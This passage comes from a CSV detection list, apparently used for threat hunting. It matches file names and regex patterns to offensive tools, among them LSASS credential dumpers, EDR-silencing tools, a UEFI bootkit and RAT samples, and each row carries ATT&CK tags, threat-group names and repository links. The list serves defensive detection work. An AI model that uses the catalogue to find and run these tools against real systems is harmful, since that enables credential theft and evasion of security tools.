user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15101" "*\dumper2020_exe.cpp*",".{0,1000}\\dumper2020_exe\.cpp.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15102" "*\dumper2020-master*",".{0,1000}\\dumper2020\-master.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15103" "*\dumpert.*",".{0,1000}\\dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 
BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","15104" "*\dumpert.dmp*",".{0,1000}\\dumpert\.dmp.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","15105" "*\dumpert.py*",".{0,1000}\\dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","15106" "*\Dumpert\*",".{0,1000}\\Dumpert\\.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","15107" "*\DumpExt.dll*",".{0,1000}\\DumpExt\.dll.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","15108" "*\DumpIt.exe*",".{0,1000}\\DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15109" "*\DumpLsass.ps1*",".{0,1000}\\DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15110" "*\dump-lsass.py*",".{0,1000}\\dump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","0","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","15111" "*\DumpLSASS-main*",".{0,1000}\\DumpLSASS\-main.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping 
lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","15112" "*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","15113" "*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","15114" "*\DumpNParse-main*",".{0,1000}\\DumpNParse\-main.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","15115" "*\DumpNTLMInfo.py*",".{0,1000}\\DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15116" "*\DumpPEFromMemory.sln*",".{0,1000}\\DumpPEFromMemory\.sln.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15117" "*\DumpPEFromMemory.vcxproj*",".{0,1000}\\DumpPEFromMemory\.vcxproj.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15118" "*\dumpSecrets.go*",".{0,1000}\\dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15120" 
"*\dumpsecrets_test.go*",".{0,1000}\\dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15121" "*\DumpShellcode*",".{0,1000}\\DumpShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","15122" "*\DumpSomeHashesAuto.py*",".{0,1000}\\DumpSomeHashesAuto\.py.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","15123" 
"*\DumpSvc.exe*",".{0,1000}\\DumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","15124" "*\DumpThatLSASS.*",".{0,1000}\\DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","15125" "*\DumpThatLSASS\*",".{0,1000}\\DumpThatLSASS\\.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","15126" "*\dumpXor.exe*",".{0,1000}\\dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","15127" "*\dumpXor\x64\*",".{0,1000}\\dumpXor\\x64\\.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - 
Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","15128" "*\dumpy.exe*",".{0,1000}\\dumpy\.exe.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","15129" "*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","15206" "*\Eagle RAT.exe*",".{0,1000}\\Eagle\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15207" "*\earthworm.exe*",".{0,1000}\\earthworm\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15208" "*\EASSniper.ps1*",".{0,1000}\\EASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","15209" "*\EASSniper.ps1*",".{0,1000}\\EASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","15210" "*\eas-valid-users.txt*",".{0,1000}\\eas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","15211" "*\eb.exe*payload_x64.dll*",".{0,1000}\\eb\.exe.{0,1000}payload_x64\.dll.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15212" "*\eb.exe*payload_x86.dll*",".{0,1000}\\eb\.exe.{0,1000}payload_x86\.dll.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15213" "*\eb.exe*payload32.exe*",".{0,1000}\\eb\.exe.{0,1000}payload32\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15214" "*\eb.exe*payload64.exe*",".{0,1000}\\eb\.exe.{0,1000}payload64\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation 
tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15215" "*\ebapc_injection.exe*",".{0,1000}\\ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15216" "*\ebowla.py*",".{0,1000}\\ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","15217" "*\ecrprivenum.py*",".{0,1000}\\ecrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15218" "*\ecrpubenum.py*",".{0,1000}\\ecrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15219" "*\EdgeDump.ahk*",".{0,1000}\\EdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - 
T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15220" "*\EDR_Detector.rs*",".{0,1000}\\EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","15221" "*\edraser.py*",".{0,1000}\\edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","15222" "*\EDRPrison.csproj*",".{0,1000}\\EDRPrison\.csproj.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","15223" "*\EDRPrison-main*",".{0,1000}\\EDRPrison\-main.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","15224" "*\EDRSilencer.c*",".{0,1000}\\EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response 
(EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","15225" "*\EfiDSEFix.cpp*",".{0,1000}\\EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15226" "*\EfiDSEFix.exe*",".{0,1000}\\EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15227" 